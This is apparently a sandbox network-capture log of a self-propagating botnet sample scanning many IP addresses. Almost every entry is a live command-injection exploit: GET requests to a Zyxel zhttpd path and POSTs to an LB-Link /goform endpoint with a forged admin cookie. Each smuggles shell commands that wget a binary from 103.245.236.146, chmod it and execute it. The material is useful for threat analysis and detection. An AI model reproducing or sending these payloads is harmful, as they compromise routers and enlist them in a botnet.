                                                  Jan 19, 2024 18:23:51.984783888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3603192.168.2.1343132153.7.17.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984852076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3604192.168.2.13531545.123.50.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984862089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3605192.168.2.133373058.85.112.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984910011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3606192.168.2.1347812222.208.22.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984940052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3607192.168.2.1359434220.148.215.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984993935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3608192.168.2.134680643.72.20.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985032082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3609192.168.2.133281869.218.110.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985083103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3610192.168.2.135618223.120.246.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985136032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3611192.168.2.133440638.38.212.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985163927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3612192.168.2.135779096.48.28.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985203981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3613192.168.2.134729297.223.203.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985250950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3614192.168.2.133849038.173.67.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985296965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3615192.168.2.135822061.55.242.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985327005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3616192.168.2.1350036220.189.232.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985377073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3617192.168.2.1338366159.73.41.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985421896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3618192.168.2.1357528163.41.80.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985457897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3619192.168.2.135917679.22.235.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985481024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3620192.168.2.13490925.7.102.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985537052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3621192.168.2.1335692205.154.119.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985563993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3622192.168.2.135601494.111.237.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985619068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3623192.168.2.134556836.218.77.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985647917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3624192.168.2.135363834.160.227.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985707998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3625192.168.2.1346416152.61.204.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985707998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3626192.168.2.1354926112.201.182.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985758066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3627192.168.2.1343402145.31.118.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985797882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3628192.168.2.1342486177.205.143.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985831022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3629192.168.2.1356434114.121.10.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985852003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3630192.168.2.1349658169.91.81.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985901117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3631192.168.2.1351206166.159.225.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985938072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3632192.168.2.133892836.198.226.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.985969067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3633192.168.2.136052881.117.248.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.986038923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3634192.168.2.1345036109.40.122.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.986078024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3635192.168.2.135111879.110.102.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.986108065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3636192.168.2.134642491.154.164.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.986143112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3637192.168.2.1341020105.130.140.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.986183882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3638192.168.2.134652837.13.210.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989581108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3639192.168.2.133441276.135.60.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989614010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3640192.168.2.1337868120.158.121.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989665985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3641192.168.2.1337204221.58.154.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989701033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3642192.168.2.1338156165.213.97.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989746094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3643192.168.2.1345656171.22.40.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989788055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3644192.168.2.1355634116.231.207.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989825964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3645192.168.2.135719634.139.161.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989840031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3646192.168.2.1348536167.139.71.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.989918947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3647192.168.2.1347140172.65.69.1738080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.148962021 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3648192.168.2.1342162104.25.230.288080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.149060011 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:52.267261028 CET328INHTTP/1.1 400 Bad Request
                                                  Server: cloudflare
                                                  Date: Fri, 19 Jan 2024 17:23:52 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 155
                                                  Connection: close
                                                  CF-RAY: -
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3649192.168.2.1335916195.49.242.898080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.248409033 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:52.467817068 CET59INHTTP/1.1 400 Bad Request
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3650192.168.2.136013649.12.75.2048080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.455787897 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:52.665152073 CET511INHTTP/1.1 400 Bad Request
                                                  Date: Fri, 19 Jan 2024 17:23:52 GMT
                                                  Server: Apache
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-Xss-Protection: 1; mode=block
                                                  Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Content-Length: 126
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                  Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3651192.168.2.133632879.148.243.1708080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.705708027 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
